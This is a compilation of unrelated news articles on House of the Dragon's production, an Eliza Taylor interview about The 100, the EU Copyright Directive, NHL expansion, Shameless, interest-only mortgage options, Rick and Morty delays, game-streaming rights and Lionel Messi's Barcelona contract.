HBO has ordered a full series for the spin-off, set 300 years before the events of Game of Thrones. As well as introducing new characters and locations to the world of Westeros, production for the series will undergo a major shift as the network moves ahead with more tales from George R. R. Martin’s fantasy franchise. The first of several potential spin-offs for the series, House of the Dragon, will trace the lineage of House Targaryen. The royal line includes Daenerys Targaryen (played by Emilia Clarke), who met her demise in the finale of the eighth and final season. Filming for the series is set to mark a major change in Game of Thrones production, as HBO has just ended its tenancy with Titanic Studios in Belfast. One of Europe’s largest studios, multiple seasons of Game of Thrones were filmed in Northern Ireland’s landmark set, including a gigantic built location for King’s Landing sequences. READ MORE: Emilia Clarke: Game of Thrones star admits her BROTHER stole from set US production company HBO, which also oversees hits such as Watchmen and Westworld, issued a ‘letter of notification’ to Titanic Studios, Northern Ireland Screen and other associates informing them the facilities are no longer needed. NI Screen chief executive Richard Williams confirmed that House of the Dragon will not be filmed in the Belfast studio. He said: “All that is happening… is that they have served notice to Titanic Quarter that they would not be holding the studios.” Mr Williams added that NI Screen encouraged HBO to do so, as their deal stated that other networks would be unable to use the facilities unless HBO terminated their vacancy. News of HBO leaving Belfast is also arriving on the back of further uncertainty for the landmark fantasy property. Another Game of Thrones prequel, starring Naomi Watts, filmed a pilot episode earlier last year, but was reported to have been cancelled in November 2019. When the news broke, US outlet Deadline reported HBO decided not to go ahead with the full series after a lengthy post-production process, including major re-editing. Other factors were cited, including creative differences between the network and showrunner Jane Goldman and overruns on the show’s budget. Now that Eliza Taylor‘s character has been unwittingly co-opted by a mysterious individual named Josephine, every fan of The CW’s The 100 wants to know one thing: Is the Clarke Griffin we know and love really… dead? “Well, that’s the question, isn’t it?” Eliza Taylor tells TVLine. “I was reading comments on Twitter, expecting this big uproar, but everyone was just like, ‘Clarke will be back. It’s fine.’ I can’t spoil anything, but the way in which they’re going to try to get her back is really, really interesting. I think the writers have outdone themselves with this storyline. It’s pretty damn cool. I think Episode 7 was my favorite of the season, and you’ll know why when you see it.” Ahead of tonight’s new episode (The CW, 9/8c), read on for more of Taylor’s thoughts about the whole Josephine situation, including the biggest hurdle she had to overcome while perfecting her performance: TVLINE | Is it bad to say that I kind of love Josephine? TVLINE | I don’t know how to explain it, she just… goes for it. All the time. TVLINE | Earlier this year, Jason [Rothenberg] told me that he put you through your hardest season yet. Now I get what he was saying. TVLINE | I think so. How many languages have you had to speak?! TVLINE | All of which you were already fluent in, I’m sure. TVLINE | Every season of this show feels like a mini reboot, but this year is especially different. What have you enjoyed about Sanctum? TVLINE | Without giving too much away, there’s a scene in tonight’s episode where you dance around your room, and you look so happy. At first, I was like, “I don’t think I’ve ever seen Clarke so happy.” Then I remembered, it’s not Clarke! TVLINE | Lastly, Clarke and Bellamy had a pretty emotional moment last week. And then he was kind of watching her on the dance floor. Do your feelings about that relationship — and what it could be — ever evolve? Your thoughts on all things Josephine? Drop ’em in a comment below.
No, that’s good. I love her, too.
Yeah. The one great thing about playing Josephine is that she’s so different from Clarke. She’s uncompromising, she’s selfish, she’s carefree — it was a joy to step outside of Clarke for a little bit.
It was challenging, for sure. It’s one thing to go to a different film or TV show and play a different character, but to be playing one on the same show who’s pretending to be your previous character … was very, very challenging. But hopefully I did it justice.
Oh my God… Let’s see… Mandarin, Portguese, French — I think that’s it.
[Laughs] Oh, yeah, I don’t speak any of those languages. So to have to speak them well, like I knew what I was doing, was so difficult. I learned French in Year 7, but all I remember is how to count to 10. So it was tricky.
When we did the finale of Season 5 and we ended up orbiting this new planet, I was like, “OK, so… We could go really crazy, like with aliens, or with another colony of the human race that’s been left on this planet. I was like, “I hope we go the second way because I don’t think we could pull off aliens and stuff like that.” I was a little concerned, because there were so many wild ideas floating around the writers’ room. The way they’ve done it is great. Everyone’s still relatable, they’re members of the human race, but they’re in a completely different environment.
That was the best part about getting to play Josephine, though I was worried that I forgot how to play happy and carefree. I was like, “Maybe I’ve been Clarke for so long that it’s not going to come off well.” But the director of that episode, Ian Samoil, was amazing. I was really nervous about dancing and rapping in French. And I can’t paint. So I was like, “I can’t do it. I’ve done a lot for you guys, but this is crazy.” So he had the crew leave and we just danced around like idiots so that I could feel more comfortable.
Yeah, I kind of go up and down with it. I love their relationship, and how strong their bond is. And I love working with Bob, so if it means that our characters get together, I’d be totally fine with that. Or if it meant that they stay friends and work together, I’m still really happy. He’s my best friend, so it’s pretty damn fun.

Internet giants like Google might breathe a little easier in Europe… at least, for now. The EU has called off January 21st negotiations for a final vote on the controversial Copyright Directive after 11 countries, including Germany, Italy and the Netherlands, said they wouldn’t support the latest version of the proposal. European Parliament Member Julia Reda noted that most of these countries (Croatia and Portugal are exceptions) have previously argued that the disputed Articles 11 and 13 of the directive didn’t do enough to protect users’ rights, and this may have played at least some part in their opposition.
Critics have regularly described Article 11 as a “link tax,” since it gave companies the right to charge sites like Google for merely including content with links, even if it’s just a brief snippet to show the user what they’re seeing. Article 13, meanwhile, has raised concerns that internet companies would be virtually required to implement copyright filters and wouldn’t have enough protections for fair use rights.
This doesn’t mean that the Copyright Directive is gone, or that Articles 11 and 13 will go away. However, it may need a significant overhaul if it’s going to come to a vote. That, in turn, could delay any implementation. European elections are scheduled for May, just two months after the originally planned March vote on the Directive — there isn’t much room to breathe if there’s a significant setback.

Things are going well enough that the NHL is ready to expand to Seattle and the salary cap keeps going up.
But the league is still dealing with a few uncertain situations on the eve of what should be a slam-dunk expansion vote to bring Seattle into the fold.
The Ottawa Senators' downtown arena project is in danger of falling apart, and Arizona Coyotes owner Andrew Barroway is looking for a partner as he tries to secure a long-term home in the desert. Meanwhile, the league would like to begin making plans for a 2020 World Cup of Hockey but has no guarantee of labour peace that would allow such a tournament to take place.
"If we're going to do a World Cup, and do it with the planning necessary, if we don't know by the first of the year or All-Star, then there's no sense in trying to pull off a World Cup for 2020," Commissioner Gary Bettman said Monday. "For the last year and a half, two years, we've been anxious to anchor plans for a World Cup, but for whatever reason the Players' Association hasn't been prepared to do that."
Bettman updated the Board of Governors on those topics and others before the vote that's expected to award Seattle the league's 32nd franchise. The team would begin play in the 2021-22 season, a year after original plans because arena renovations aren't scheduled to be finished until the fall of 2020.
Seattle expansion and the realignment that comes with it will be announced Tuesday.
Those topics weren't discussed on the first day of the board's annual December meeting that was more about league business. Bettman says the salary cap is projected to go up to roughly $ 83 million US next season, up from the current $ 79.5 million limit. That's a sign revenues are continuing to rise after the success of the expansion Vegas Golden Knights.
"The fact that the salary cap continues to increase means revenue's continued to increase, which means the state of the sport and the business is very healthy — as healthy as it's ever been," Deputy Commissioner Bill Daly said. "And that's good for us, that's good for the players. I think it's good for everybody."
There isn't yet agreement between the league and the Players' Association that would ensure neither side chooses to terminate the current collective bargaining agreement in September 2020.
"There hasn't been any substantive dialogue on any of the topics that I assume [players] may or may not want to conclude," Bettman said. "They know the time frame. The puck's in their end."
An NHLPA spokesman said the group did not have anything to add on the topic of potential CBA talks.
Situations with the Senators and Coyotes are league concerns that bear watching with particular attention on Melnyk suing his partner for $ 700 million in the aftermath of the failing arena development plan. Bettman said he's "disappointed" with how things have gone in Ottawa, which ranks 27th in attendance at its rink outside Canada's capital.
"I think for a whole host of reasons [a new downtown arena] would be nice, but Mr. Melnyk has said if he has to make Canadian Tire Centre work, he can do that," Bettman said. "This is a complicated situation, although in its original form, for a lot of reasons, some of which you've read in the complaint that's been filed, the project as originally envisioned unfortunately isn't viable."
It's unclear what's viable long-term for the Coyotes, who have been fighting for years for a stable arena situation in the Phoenix area. Barroway, who became the Coyotes' sole owner in June 2017, is now looking to sell a portion of the team in what would be another shakeup atop an organization all too used to changes and uncertainty in recent years.
"I think Andy Barroway's made clear that he's looking for a partner," Daly said. "There's been a lot of discussion around that, and I think he's hopeful that something can happen in the near term. … I think the efforts there will be on getting a new arena. So we have some patience."

Shameless‘ Fiona would like to DTR — that’s “define the relationship,” for the uninitiated — but that’s easier said than done when you’re dating an Irish carpenter of few words.
Fi’s current beau Ford is “hard to read, and that’s difficult for a girl who likes to know what’s the what,” star Emmy Rossum shares in TVLine’s exclusive Season 9 video preview. Plus, it wouldn’t be Shameless if the gal didn’t have feelings for a guy who’s potentially emotionally unavailable.
“Fiona’s definitely been drawn into things that were unhealthy,” Rossum adds. “Even though that’s not a good feeling, it’s a comfortable and familiar feeling. And that’s the kind of perverse love and debaucherous loyalty that is this family.”
On the job front, work is going well for Fiona, who is looking to expand her entrepreneurial enterprise with commercial properties. Although Ford warns that the venture comes with more risk, and a businessman is more interested in sleeping with Fi than doing business with her, “she’s got her feet on the ground now,” Rossum says. “It’s just a question of if she’ll bite off more than she’s ready for.”
Shameless‘ expanded ninth season premieres Sunday, Sept. 9 at 9/8c on Showtime with its first seven episodes. It will then return on Sunday, Jan. 20, 2019 at 9 pm with the season’s remaining seven episodes.

Warren Shute provides his advice for people worried about their interest-only mortgages (Image: GETTY)
The FCA released a notice about their concerns on this subject at the beginning of this year because 2018 shows a peak in the number of mortgages coming due, especially interest-only mortgages. There are further peaks due in 2027 and 2032.
We’re talking big numbers here: 1.67m interest-only or part-interest mortgages are in the marketplace at the moment, which represents nearly 20 per cent of all outstanding mortgages in this country.
If this doesn’t affect you, it’s likely to affect some of your friends and family. So how should you handle the situation in advance of the end of your term?
How do interest-only mortgages work? These mortgages were popular before 2007 and the financial crash, with people looking for more affordable repayments and thinking that house prices were always going to keep going up.
An interest-only mortgage is one where you pay only the interest and not the mortgage balance itself. Let’s say you have a £100,000 mortgage charged at five per cent annual interest, at the end of the year you’ll have paid £5,000 but you still owe the £100,000; fast-forward 25 years and you still owe that £100,000.
If you’ve got one of these mortgages, your biggest concern is: how are you going to pay your mortgage back? Don’t panic, just make sure you have a strategy in place – here are your options.
Evaluate (and re-evaluate) your original thinking
Step 2 of my book The Money Plan is to get financially organised, by knowing what you’ve got: your assets and liabilities, your income and expenditure.
What assets do you have that you can offset against your final capital payment? And is your original strategy still the right one?
Most people with an interest-only mortgage should have set up an investment or repayment vehicle to run alongside it – possibly a PEP or an ISA, or even an endowment policy or personal pension plan – giving them a lump sum to pay off the borrowing at the end of the term. If you did, you have a few options available:
Option 1: Cash in and switch to repayment terms
Whatever your strategy when you took the mortgage, you should re-evaluate it now. Why? As a rule of thumb, if you have an endowment policy or ISA that was put in place to repay the mortgage at the end of your term, it’s probably advantageous to cash in now instead and pay off some of the balance.
At the same time, you should switch over to a repayment mortgage that will see your loan completely cleared at the end of its remaining term.
An important note to remember: if you’ve had a policy running for less than 10 years then check for any tax liability or surrender charges before you cash it in; if in doubt, seek professional advice first.

A top tip would be to consider downsizing your home (Image: GETTY)
Doing this is probably your cheapest long-term option. You’ll have a smaller remaining balance, though you’ll also have higher monthly payments.
If you find the new premiums too high, ask if you can extend the term and push it out a little longer. Bear in mind not to go too far into the future – don’t extend debt past your retirement date.
If the new monthly repayments are still too expensive then it may be necessary to leave some of the mortgage on interest-only – but remember that money will still be owed at the end of your term, don’t bury your head in the sand. Try to chip away at it along the way if you get bonuses, commissions or other extra cash.
Option 2: Maintain your position
If your repayment vehicle is on track and you’re happy with it, then you might choose to maintain your current status quo on the understanding that your strategy will cover your final lump sum payment.
But do keep an eye on it and keep it under regular review, this is a higher risk approach. You need to be comfortable taking that element of risk.
Option 3: Switch and maintain!
If you can afford to switch the interest-only mortgage to a repayment one over the remaining term, plus keep your savings vehicle going, then that will give you a nice addition to any retirement funding or plans you have.
But for many, switching AND continuing the investment vehicle will be expensive and unaffordable.
Option 4: Cash in and downsize
What you might have to do at the end of the term (or even before it so that you’re not under pressure) is to sell your property. Downsizing might have always been part of your strategy, or it might be something forced upon you by your finances.
Either way, if you cash in your investment vehicle now and pay off some of your mortgage, then when it’s time to downsize you’ll have lots of equity, potentially enough to buy a smaller property and have some money left over.

Dan Harmon has spilled the sauce: Rick and Morty could be in trouble.
The cult animated TV series has seen delay after delay for its fourth season and according to co-creator and writer Harmon, Rick and Morty still has not been picked up by Adult Swim.
Delays are par the course for Rick and Morty fans. Fans were treated to an excruciating two-year wait between seasons 2 and 3, and it looked like they would have to wait even longer for season 4 after series writer Ryan Ridley suggested the series likely wouldn’t return until 2019.
However, co-creator and writer Dan Harmon has confirmed that Adult Swim, Cartoon Network’s adult-oriented programming block, has yet to renew Rick and Morty for its fourth season.
In a discussion with a rude Rick and Morty fan who lashed out against Harmon for delaying the fourth season, Harmon suggested that the series hasn’t yet been picked up by Adult Swim.
I hear ya, tough spot. On one hand, it can be challenging, especially with crippling lazy alcoholism, to write a show that hasn’t been ordered by a network. On the other hand, the thought that fans like you pay the price…I mean…I’m gonna grab a drink https://t.co/mvn9nthxCE
— Dan Harmon (@danharmon) March 17, 2018
It’s possible that there’s no cause for alarm — Adult Swim has a reputation for unusual management practices that allow greater freedom for its creators. The network’s other critically acclaimed series, The Venture Bros., has only produced 6 seasons over the course of its 15-year run. And it appears that Harmon, co-creator Justin Roiland, and Adult Swim are all equally to blame for Rick and Morty‘s numerous delays.
“They really take their time,” Ridley told Detroit Cast. “I never understood why everybody — all parties, Dan [Harmon], Justin [Roiland], and Adult Swim — didn’t get their shit together, and make the show fast; I just don’t get it. It doesn’t make any sense to me. I’m sure they all have their reasons.”
But while Rick and Morty remains off the small screen for now, the show keeps popping up in the news. The characters recently appeared in a music video for the Run The Jewels’ song “Oh Mama” — a testament to the show’s huge cult following.
The animated series is probably best known for its ardent fanbase, whose feverish devotion could put Zack Snyder fans to shame. You know the incident I’m talking about: the McDonald’s Szechuan sauce saga. Fans were whipped into a frenzy when several McDonald’s chains ran out of the packets of sauce that appeared in the show, creating such an uproar that they appeared on local news.
It’s unfortunate that a critically acclaimed and beloved series could be marred by fan nonsense like that. However, those riots probably didn’t play a part in the ongoing delays from Adult Swim.
We’ll keep you updated on the status of Rick and Morty‘s future.

Even olds know what this is these days (credit: Microsoft)
In September of last year, the developer of Firewatch issued a DMCA takedown against now infamous YouTuber PewDiePie after he used a racial slur during a live stream of another title. The incident didn’t make headlines only because of PewDiePie’s profile or the fact that the game Firewatch wasn’t directly involved—this also represented a rare instance of legal rights being asserted between game maker and game streamer.
As much as video games are an interactive medium, in recent years an entire scene has grown out of people such as PewDiePie streaming video games online. Be it live streaming on Twitch, or Let’s Plays or other types of video content on YouTube, gaming has gone from just something players do at home, to something that they also watch other people do online.
As these streamers and personalities have grown in popularity, so too has the discussion over the rights of streamers and developers in regards to said content. Are streams covered under fair use with content creators allowed to make money off of them? Or should the original creators of the games have a say in how their products are used in the public eye, not to mention a chance to generate profit? Developers like Ubisoft and Microsoft have shown a willingness to work with creators and encourage game streaming (and earning). Nintendo, on the other hand, is known for enforcing its copyright in this area. Atlus, too, received pushback surrounding the company’s initial policy for streaming Persona 5.

Messi has still yet to sign the new deal that was supposed to be agreed during the summer.
His current contract runs out next summer and he has been linked with a stunning move to Manchester City.
And this week he’s claimed he wants to play for boy-hood club Newell’s Old Boys in Argentina before he hangs up his boots.
And Diario Gol claim he wants the freedom to leave Barcelona whenever he chooses – and wants it written into his deal before he pens what would essentially be a rolling contract.
Messi, 30, has been on fire this season, scoring 12 goals with Barcelona eight points clear of Real Madrid already.
Barca are four points clear of second-place Valencia and look on course for another title.
While on international duty he said: “I would love to play at Newell’s.
“It’s a long-term dream, but the truth is that I do not know what can happen.”
Diario Gol claim Messi believes his demand is acceptable and Barcelona will accept without any problems.
Messi made his Barcelona debut aged 16 before blossoming into the best in the world.
And 14 years on, having won eight La Liga titles and the Champions League four times, he feels like he has earned the right to decide when to quit the club and finish his career in Argentina.
